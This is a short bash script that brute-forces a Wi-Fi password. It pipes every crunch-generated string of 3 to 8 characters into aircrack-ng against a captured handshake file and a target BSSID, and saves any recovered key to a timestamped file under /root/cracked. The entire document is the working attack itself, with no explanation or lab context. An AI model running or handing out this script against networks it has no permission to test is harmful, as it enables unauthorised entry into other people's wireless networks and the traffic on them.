#!/bin/bash

PWD_MIN_LENGTH=3
PWD_MAX_LENGTH=8
CRUNCH_CHARSET_FILE=/usr/share/crunch/charset.lst
CRUNCH_CHARSET=mixalpha-numeric-all-space
AIRCRACK_CPU_NUMBER=1
PASSWORD_RESULT_DIR=/root/cracked
PASSWORD_RESULT_FILE=$PASSWORD_RESULT_DIR/password-$(date "+%Y.%m.%d-%H.%M.%S").txt

CAP_FILE=$1
BSSID=$2

if [ ! -d $PASSWORD_RESULT_DIR ]; then
    mkdir -p $PASSWORD_RESULT_DIR
fi

set -x

crunch $PWD_MIN_LENGTH $PWD_MAX_LENGTH -f $CRUNCH_CHARSET_FILE $CRUNCH_CHARSET | aircrack-ng -p $AIRCRACK_CPU_NUMBER -w - -l $PASSWORD_RESULT_FILE -b $BSSID $CAP_FILE

